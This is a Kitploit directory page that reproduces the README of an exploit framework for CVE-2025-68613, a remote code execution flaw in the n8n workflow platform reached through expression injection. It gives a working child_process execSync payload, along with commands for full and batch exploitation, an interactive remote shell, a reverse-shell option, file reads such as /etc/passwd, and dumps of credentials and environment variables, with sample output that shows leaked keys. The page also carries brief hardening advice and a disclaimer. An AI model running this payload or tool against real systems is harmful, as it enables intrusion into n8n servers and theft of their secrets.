Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate — n8n God Mode Ultimate - CVE-2025-68613 扫描器 v1.0.0 ║ ║ 工作流自动化远程代码执行 | Kitploit
工具/GitHubGitHub/hackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate
漏洞扫描器漏洞利用Web应用程序漏洞利用信息收集后渗透利用渗透测试命令与控制学习与教育红队
远程访问工具
Payload 开发
GitHubhackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate

n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

n8n God Mode Ultimate - CVE-2025-68613 扫描器 v1.0.0 ║ ║ 工作流自动化远程代码执行

查看仓库
53149个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

n8n God Mode Ultimate - CVE-2025-68613 扫描与利用框架

n8n God Mode Ultimate

高级 n8n 工作流自动化 RCE 扫描与利用工具

Python Version License CVE CVSS Score


🎯 概览

n8n God Mode Ultimate 是一个全面的安全测试框架,旨在检测和验证 n8n 工作流自动化平台中的 CVE-2025-68613。该严重远程代码执行(RCE)漏洞通过工作流执行上下文中的表达式注入影响 n8n 版本。

CVE-2025-68613 详情

  • CVSS 评分: 10.0(严重)
  • 攻击向量: 网络
  • 攻击复杂度: 低
  • 所需权限: 低(有效凭据)
  • 用户交互: 无
  • 漏洞类型: 表达式注入 → 远程代码执行

受影响的版本:

  • n8n >= 0.211.0 且 < 1.120.4
  • n8n >= 1.121.0 且 < 1.121.1

已修复的版本:

  • n8n >= 1.120.4
  • n8n >= 1.121.1
  • n8n >= 1.122.0

✨ 功能特性

🔍 检测与扫描

  • 智能版本检测 - 从登录页面元数据提取 n8n 版本
  • 批量扫描 - 多线程并发目标扫描,带进度跟踪
  • 多种扫描模式:
    • --detect - 仅版本检测(最快,非侵入式)
    • --safe - 安全漏洞检查,不进行利用
    • --poc - RCE 概念验证
    • --exploit - 完全利用模式

💣 利用能力

  • 4 种利用技术:
    1. 计划触发器 - 自动执行工作流(最可靠)
    2. Webhook 触发器 - HTTP 触发的执行
    3. 代码节点 - 直接 child_process 访问
    4. 表达式注入 - 手动表达式执行

🎮 God Mode 特性

  • 交互式 Shell - 完整远程 shell,带命令历史
  • 文件操作:
    • read <file> - 读取远程文件
    • write <file> <content> - 写入文件到目标
  • 环境变量提取 - 导出所有环境变量
  • 系统信息 - 操作系统详情、网络配置、进程信息
  • 反向 Shell - 可选的反向 Shell 载荷生成
  • 命令历史 - 内置历史跟踪

📊 高级能力

  • 凭据枚举 - 通过 API 提取存储的凭据
  • 工作流导出 - 导出所有工作流及其元数据
  • 配置提取 - 完整系统配置导出
  • 用户枚举 - 列出所有 n8n 用户
  • 执行日志分析 - 解析工作流执行的命令输出
  • 自动清理 - 执行后可选择删除工作流

🚀 安装

前提条件

# Python 3.8 或更高版本
python3 --version

# pip 包管理器
pip3 --version

安装依赖

# 克隆仓库
git clone https://github.com/hackersatyamrastogi/n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate.git
cd n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

# 安装所需包
pip3 install -r requirements.txt

依赖项

requests>=2.31.0
urllib3>=2.0.0
tqdm>=4.66.0
colorama>=0.4.6

📖 使用方法

基本用法

# 显示帮助菜单
python3 n8n-godmode-ultimate.py -h

# 检测 n8n 版本(非侵入式)
python3 n8n-godmode-ultimate.py -u http://target:5678 --detect

# 安全漏洞检查
python3 n8n-godmode-ultimate.py -u http://target:5678 --safe -e [email protected] -p password

# RCE 概念验证
python3 n8n-godmode-ultimate.py -u http://target:5678 --poc -e [email protected] -p password

# 完全利用
python3 n8n-godmode-ultimate.py -u http://target:5678 --exploit -e [email protected] -p password

God Mode 操作

# 执行单个命令
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --cmd "whoami"

# 读取远程文件
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --read-file "/etc/passwd"

# 写入远程文件
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --write-file "/tmp/test.txt" --content "payload"

# 提取环境变量
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --dump-env

# 交互式 Shell
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --shell

批量扫描

# 从文件扫描多个目标
python3 n8n-godmode-ultimate.py -l targets.txt --detect -t 20

# 批量利用
python3 n8n-godmode-ultimate.py -l targets.txt --poc -e [email protected] -p password -t 10

targets.txt 格式:

http://target1:5678
https://target2.example.com
http://192.168.1.100:5678
https://n8n.example.org

交互式 Shell 命令

进入 shell 模式(--shell)后:

n8n> whoami              # 执行命令
n8n> read /etc/passwd    # 读取文件
n8n> env                 # 显示环境变量
n8n> info                # 系统信息
n8n> history             # 命令历史
n8n> exit                # 退出 shell

🛠️ 命令行选项

目标选项

-u, --url URL             目标 n8n URL
-l, --list FILE           包含目标 URL 的文件
-t, --threads NUM         批量扫描的线程数(默认: 10)

认证

-e, --email EMAIL         n8n 用户邮箱
-p, --password PASS       n8n 用户密码

扫描模式

--detect                  仅版本检测(最快)
--safe                    安全检查,不进行利用
--poc                     RCE 概念验证
--exploit                 完全利用模式

God Mode

--god                     启用 God Mode
--cmd COMMAND             执行单个命令
--read-file PATH          读取远程文件
--write-file PATH         写入远程文件
--content DATA            写操作的内容
--dump-env                提取所有环境变量
--shell                   交互式 Shell 模式
--revshell HOST:PORT      反向 Shell 载荷

利用选项

--mode MODE               利用模式: schedule|webhook|code|expression(默认: schedule)
--timeout SEC             命令超时秒数(默认: 30)
--cleanup                 执行后删除工作流
-k, --insecure           禁用 SSL 验证
-v, --verbose            详细输出
-q, --quiet              最小输出

🔬 技术细节

利用方法

1. 计划触发器(推荐)

创建一个带计划触发器的工作流,每 3 秒自动执行。最可靠的方法。

载荷: {{(function(){
  return this.process.mainModule.require('child_process')
    .execSync('whoami').toString()
})()}}

2. Webhook 触发器

创建一个 HTTP Webhook 端点,在触发时执行命令。

3. 代码节点

将代码直接注入具有 child_process 访问权限的代码节点。

4. 表达式注入

通过 n8n 的表达式评估系统手动执行。

版本检测

从登录页面中 base64 编码的 Sentry 配置提取版本:

<meta name="n8n:config:sentry" content="eyJ2ZXJzaW9uIjoi..." />

使用的 API 端点

  • /rest/login - 认证
  • /rest/workflows - 工作流 CRUD 操作
  • /rest/credentials - 凭据枚举
  • /rest/executions - 执行日志检索
  • /rest/users - 用户枚举
  • /rest/settings - 系统配置

📊 输出示例

版本检测

[*] n8n God Mode Ultimate v1.0.0
[*] 目标: https://target.example.com
[✓] n8n 版本: 1.36.1
[!] 状态: 存在漏洞(< 1.120.4)

RCE 概念验证

[*] 认证成功
[*] 正在创建利用工作流...
[*] 工作流 ID: hd6LxSY765WBThqd
[*] 正在执行命令: whoami
[✓] 命令执行成功!
[+] 输出: root

交互式 Shell

n8n> whoami
[+] root

n8n> read /etc/hostname
[+] n8n-production-server

n8n> env
[+] 环境变量:
N8N_ENCRYPTION_KEY=a1b2c3d4e5f6...
DATABASE_HOST=postgres.internal
AWS_ACCESS_KEY_ID=AKIA...

🛡️ 防御措施

立即行动

  1. 升级到已修复版本(>= 1.120.4 或 >= 1.121.1)
  2. 禁用默认凭据([email protected]:admin)
  3. 实施强认证(建议使用 MFA)
  4. 网络分段 - 限制 n8n 实例访问
  5. 审计工作流 - 检查所有活跃工作流
  6. 监控执行日志 - 检查可疑活动

长期加固

  • 启用审计日志
  • 实施 IP 白名单
  • 使用 OAuth/SSO 认证
  • 定期安全评估
  • 保持 n8n 更新
  • 数据库静态加密
  • 安全凭据存储
  • 网络流量监控

⚠️ 法律免责声明

仅用于授权的安全测试

本工具仅供教育目的和授权的安全测试使用。用户必须遵守所有适用的法律法规。

⚖️ 法律要求

您必须:

  • ✅ 在测试前获得书面授权
  • ✅ 仅用于您拥有或获得测试许可的系统
  • ✅ 遵守负责任的披露实践
  • ✅ 遵守适用的法律法规
  • ✅ 用于防御性安全目的

您不得:

  • ❌ 未经明确许可测试系统
  • ❌ 用于恶意目的
  • ❌ 执行拒绝服务攻击
  • ❌ 未经授权导出或修改数据
  • ❌ 未经同意在生产系统上部署

📜 责任

作者对本工具的 misuse 不承担任何责任。未经授权访问计算机系统是非法的,适用法律包括:

  • 计算机欺诈与滥用法(CFAA)- 美国
  • 计算机滥用法 - 英国
  • 欧盟网络犯罪指令
  • 全球类似立法

使用风险自负。您对自己的行为负责。


🤝 贡献

欢迎贡献!请遵循以下指南:

  1. Fork 仓库
  2. 创建功能分支(git checkout -b feature/improvement)
  3. 提交您的更改(git commit -am '添加新功能')
  4. 推送到分支(git push origin feature/improvement)
  5. 创建 Pull Request

行为准则

  • 遵循负责任的披露实践
  • 清晰记录安全特性
  • 包含适当的错误处理
  • 为复杂逻辑添加注释
  • 在提交前充分测试

📚 参考

CVE 信息

  • CVE-2025-68613 - NVD
  • n8n 安全公告

n8n 文档

  • n8n 官方文档
  • n8n API 参考
  • n8n 安全最佳实践

安全研究

  • 表达式注入漏洞
  • 工作流自动化安全

👨‍💻 作者

Satyam Rastogi

  • GitHub: @hackersatyamrastogi
  • 网站: https://www.satyamrastogi.com
  • Twitter: @hackersatyamrastogi

📄 许可证

本项目采用 MIT 许可证 - 详见 LICENSE 文件。

MIT 许可证

版权(c)2025 Satyam Rastogi
下载工具